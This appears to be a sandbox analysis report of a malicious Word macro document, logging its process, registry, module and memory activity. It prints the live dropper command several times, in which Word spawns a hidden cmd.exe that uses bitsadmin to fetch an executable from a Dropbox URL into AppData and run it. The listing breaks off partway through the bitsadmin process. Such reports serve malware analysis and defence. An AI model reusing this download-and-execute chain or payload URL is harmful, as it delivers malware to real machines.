Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe"	os_pid = 0xa50, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE		1	Fn

Module (93)

Operation	Module	Additional Information	Count	Logfile
Load	C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL	base_address = 0x7fee3560000	1	Fn
Get Handle	Unknown module name	base_address = 0x7fef8cd0000	1	Fn
Get Handle	C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x76e70000	1	Fn
Get Handle	oleaut32.dll	base_address = 0x7feff1c0000	1	Fn
Get Handle	ole32.dll	base_address = 0x7fefe810000	1	Fn
Get Filename	-	process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260	2	Fn
Get Address	Unknown module name	function = MsiProvideQualifiedComponentA, address_out = 0x7fef8d53b3c	1	Fn
Get Address	Unknown module name	function = MsiGetProductCodeA, address_out = 0x7fef8d4a13c	1	Fn
Get Address	Unknown module name	function = MsiReinstallFeatureA, address_out = 0x7fef8d51618	1	Fn
Get Address	Unknown module name	function = MsiProvideComponentA, address_out = 0x7fef8d4f088	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x76e894f0	1	Fn
Get Address	c:\windows\system32\user32.dll	function = MonitorFromWindow, address_out = 0x76e85f08	1	Fn
Get Address	c:\windows\system32\user32.dll	function = MonitorFromRect, address_out = 0x76e82b00	1	Fn
Get Address	c:\windows\system32\user32.dll	function = MonitorFromPoint, address_out = 0x76e7ab64	1	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x76e85c30	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x76e7a730	1	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayDevicesA, address_out = 0x76e7a5b4	1	Fn
Get Address	Unknown module name	function = DispCallFunc, address_out = 0x7feff1c2270	1	Fn
Get Address	Unknown module name	function = LoadTypeLibEx, address_out = 0x7feff1ca550	1	Fn
Get Address	Unknown module name	function = UnRegisterTypeLib, address_out = 0x7feff2520d0	1	Fn
Get Address	Unknown module name	function = CreateTypeLib2, address_out = 0x7feff24dbd0	1	Fn
Get Address	Unknown module name	function = VarDateFromUdate, address_out = 0x7feff1c5c90	1	Fn
Get Address	Unknown module name	function = VarUdateFromDate, address_out = 0x7feff1c6330	1	Fn
Get Address	Unknown module name	function = GetAltMonthNames, address_out = 0x7feff1e66c0	1	Fn
Get Address	Unknown module name	function = VarNumFromParseNum, address_out = 0x7feff1c4710	1	Fn
Get Address	Unknown module name	function = VarParseNumFromStr, address_out = 0x7feff1c48f0	1	Fn
Get Address	Unknown module name	function = VarDecFromR4, address_out = 0x7feff1fb640	1	Fn
Get Address	Unknown module name	function = VarDecFromR8, address_out = 0x7feff1fb360	1	Fn
Get Address	Unknown module name	function = VarDecFromDate, address_out = 0x7feff202640	1	Fn
Get Address	Unknown module name	function = VarDecFromI4, address_out = 0x7feff1e58a0	1	Fn
Get Address	Unknown module name	function = VarDecFromCy, address_out = 0x7feff1e5820	1	Fn
Get Address	Unknown module name	function = VarR4FromDec, address_out = 0x7feff1faf20	1	Fn
Get Address	Unknown module name	function = GetRecordInfoFromTypeInfo, address_out = 0x7feff21a0c0	1	Fn
Get Address	Unknown module name	function = GetRecordInfoFromGuids, address_out = 0x7feff252160	1	Fn
Get Address	Unknown module name	function = SafeArrayGetRecordInfo, address_out = 0x7feff1e5af0	1	Fn
Get Address	Unknown module name	function = SafeArraySetRecordInfo, address_out = 0x7feff1e5a90	1	Fn
Get Address	Unknown module name	function = SafeArrayGetIID, address_out = 0x7feff1e5a60	1	Fn
Get Address	Unknown module name	function = SafeArraySetIID, address_out = 0x7feff1e5a30	1	Fn
Get Address	Unknown module name	function = SafeArrayCopyData, address_out = 0x7feff1c60b0	1	Fn
Get Address	Unknown module name	function = SafeArrayAllocDescriptorEx, address_out = 0x7feff1c3e90	1	Fn
Get Address	Unknown module name	function = SafeArrayCreateEx, address_out = 0x7feff219f80	1	Fn
Get Address	Unknown module name	function = VarFormat, address_out = 0x7feff249b20	1	Fn
Get Address	Unknown module name	function = VarFormatDateTime, address_out = 0x7feff249aa0	1	Fn
Get Address	Unknown module name	function = VarFormatNumber, address_out = 0x7feff249990	1	Fn
Get Address	Unknown module name	function = VarFormatPercent, address_out = 0x7feff249890	1	Fn
Get Address	Unknown module name	function = VarFormatCurrency, address_out = 0x7feff249770	1	Fn
Get Address	Unknown module name	function = VarWeekdayName, address_out = 0x7feff22b8d0	1	Fn
Get Address	Unknown module name	function = VarMonthName, address_out = 0x7feff22b800	1	Fn
Get Address	Unknown module name	function = VarAdd, address_out = 0x7feff2448e0	1	Fn
Get Address	Unknown module name	function = VarAnd, address_out = 0x7feff249470	1	Fn
Get Address	Unknown module name	function = VarCat, address_out = 0x7feff2496a0	1	Fn
Get Address	Unknown module name	function = VarDiv, address_out = 0x7feff242fe0	1	Fn
Get Address	Unknown module name	function = VarEqv, address_out = 0x7feff249cf0	1	Fn
Get Address	Unknown module name	function = VarIdiv, address_out = 0x7feff248ff0	1	Fn
Get Address	Unknown module name	function = VarImp, address_out = 0x7feff249c00	1	Fn
Get Address	Unknown module name	function = VarMod, address_out = 0x7feff248e60	1	Fn
Get Address	Unknown module name	function = VarMul, address_out = 0x7feff243690	1	Fn
Get Address	Unknown module name	function = VarOr, address_out = 0x7feff2492d0	1	Fn
Get Address	Unknown module name	function = VarPow, address_out = 0x7feff242e80	1	Fn
Get Address	Unknown module name	function = VarSub, address_out = 0x7feff243f90	1	Fn
Get Address	Unknown module name	function = VarXor, address_out = 0x7feff2491a0	1	Fn
Get Address	Unknown module name	function = VarAbs, address_out = 0x7feff227c30	1	Fn
Get Address	Unknown module name	function = VarFix, address_out = 0x7feff227a60	1	Fn
Get Address	Unknown module name	function = VarInt, address_out = 0x7feff227890	1	Fn
Get Address	Unknown module name	function = VarNeg, address_out = 0x7feff227ea0	1	Fn
Get Address	Unknown module name	function = VarNot, address_out = 0x7feff249600	1	Fn
Get Address	Unknown module name	function = VarRound, address_out = 0x7feff2276a0	1	Fn
Get Address	Unknown module name	function = VarCmp, address_out = 0x7feff2483f0	1	Fn
Get Address	Unknown module name	function = VarDecAdd, address_out = 0x7feff1f3070	1	Fn
Get Address	Unknown module name	function = VarDecCmp, address_out = 0x7feff1fd700	1	Fn
Get Address	Unknown module name	function = VarBstrCat, address_out = 0x7feff1fd890	1	Fn
Get Address	Unknown module name	function = VarCyMulI4, address_out = 0x7feff1dcaf0	1	Fn
Get Address	Unknown module name	function = VarBstrCmp, address_out = 0x7feff1e8a00	1	Fn
Get Address	Unknown module name	function = CoCreateInstanceEx, address_out = 0x7fefe81de90	1	Fn
Get Address	Unknown module name	function = CLSIDFromProgIDEx, address_out = 0x7fefe82a4c4	1	Fn
Get Address	Unknown module name	function = MsoMultiByteToWideChar, address_out = 0x7fee356f200	1	Fn
Get Address	Unknown module name	function = 600, address_out = 0x7fef0d9c6fc	3	Fn
Get Address	Unknown module name	function = 595, address_out = 0x7fef0f94a40	3	Fn
Get Address	Unknown module name	function = 632, address_out = 0x7fef0ddfe60	3	Fn
Get Address	Unknown module name	function = 516, address_out = 0x7fef0de17b0	3	Fn
Get Address	Unknown module name	function = 608, address_out = 0x7fef0de142c	3	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	-	-		1	Fn

System (29)

Operation	Additional Information	Count	Logfile
Get Cursor	x_out = 777, y_out = 852	2	Fn
Get Cursor	x_out = 897, y_out = 514	1	Fn
Get Time	type = Local Time, time = 2018-01-10 10:49:07 (Local Time)	14	Fn
Get Time	type = Ticks, time = 295902	9	Fn
Get Info	type = Operating System	2	Fn
Get Info	type = Operating System	1	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	name = DDRYBUR		1	Fn

Process #2: cmd.exe

(Host: 74, Network: 0)

Information	Value
ID	#2
File Name	c:\windows\system32\cmd.exe
Command Line	cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:17, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:09:56

OS Process Information

Information	Value
PID	0xa50
Parent PID	0x954 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A54

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000000d0000	0x000d0000	0x000dffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000000e0000	0x000e0000	0x000e1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000110000	0x00110000	0x0020ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000210000	0x00210000	0x0030ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000400000	0x00400000	0x004fffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000500000	0x00500000	0x00687fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000690000	0x00690000	0x00810fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000820000	0x00820000	0x01c1ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001c20000	0x01c20000	0x01f62fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01f70000	0x0223efff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x4ab20000	0x4ab78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76e70000	0x76f69fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76f70000	0x7708efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
winbrand.dll	0x7fef5290000	0x7fef5297fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd320000	0x7fefd38afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7fefd490000	0x7fefd49dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefd4a0000	0x7fefd568fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefe300000	0x7fefe32dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefe330000	0x7fefe396fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefebf0000	0x7fefecf8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefef80000	0x7feff01efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff3b0000	0x7feff3b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Host Behavior

File (13)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\aETAdzjz\Desktop	type = file_attributes	2	Fn
Open	STD_OUTPUT_HANDLE	-	6	Fn
Open	STD_INPUT_HANDLE	-	4	Fn
Open	STD_ERROR_HANDLE	-	1	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (3)

Operation	Process	Additional Information	Count	Logfile
Create	C:\Windows\system32\waitfor.exe	os_pid = 0xa6c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Create	C:\Windows\system32\bitsadmin.exe	os_pid = 0xa90, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe	os_pid = 0x65c, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn

Thread (1)

Operation	Process	Additional Information	Success	Count	Logfile
Resume	c:\windows\system32\cmd.exe	os_tid = 0xa54		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\cmd.exe	base_address = 0x4ab20000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x76f70000	2	Fn
Get Filename	-	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x76f86d40	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CopyFileExW, address_out = 0x76f823d0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76f78290	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x76f817e0	1	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2018-01-10 10:49:07 (UTC)		1	Fn
Get Time	type = Ticks, time = 83741		1	Fn

Environment (30)

Operation	Additional Information	Count	Logfile
Get Environment String	-	10	Fn Data
Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	3	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	4	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Get Environment String	name = appdata, result_out = C:\Users\aETAdzjz\AppData\Roaming	2	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn
Set Environment String	name = COPYCMD	2	Fn
Set Environment String	name = =ExitCode, value = 00000001	1	Fn
Set Environment String	name = =ExitCodeAscii	2	Fn
Set Environment String	name = =ExitCode, value = 00000000	1	Fn

Process #3: waitfor.exe'

Information	Value
ID	#3
File Name	c:\windows\system32\waitfor.exe
Command Line	waitfor /t 5 YKERQ
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:17, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:09:56
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xa6c
Parent PID	0xa50 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A70

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
waitfor.exe.mui	0x000e0000	0x000e2fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x0016ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000170000	0x00170000	0x00170fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000180000	0x00180000	0x00180fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001a0000	0x001a0000	0x001affff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002a0000	0x002a0000	0x0039ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000003a0000	0x003a0000	0x0049ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000004a0000	0x004a0000	0x00627fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000630000	0x00630000	0x007b0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000007c0000	0x007c0000	0x01bbffff	Pagefile Backed Memory	Readable	Region Actions
user32.dll	0x76e70000	0x76f69fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76f70000	0x7708efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
waitfor.exe	0xff370000	0xff37efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mpr.dll	0x7fef8b10000	0x7fef8b27fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wkscli.dll	0x7fefb200000	0x7fefb214fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netutils.dll	0x7fefb220000	0x7fefb22bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netapi32.dll	0x7fefb230000	0x7fefb245fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x7fefc1a0000	0x7fefc1abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x7fefcdd0000	0x7fefcdf2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x7fefce70000	0x7fefce7afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x7fefcea0000	0x7fefcec4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd320000	0x7fefd38afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7fefd490000	0x7fefd49dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefd4a0000	0x7fefd568fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefe300000	0x7fefe32dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefe330000	0x7fefe396fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x7fefe3a0000	0x7fefe3a7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefebf0000	0x7fefecf8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7fefed80000	0x7fefedf0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefef80000	0x7feff01efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x7feff040000	0x7feff08cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7feff090000	0x7feff1bcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff3b0000	0x7feff3b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Process #4: bitsadmin.exe

(Host: 188, Network: 4)

Information	Value
ID	#4
File Name	c:\windows\system32\bitsadmin.exe
Command Line	bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:22, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:09:51

OS Process Information

Information	Value
PID	0xa90
Parent PID	0xa50 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A94 0x A98 0x A9C 0x AA0 0x AA4 0x B2C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
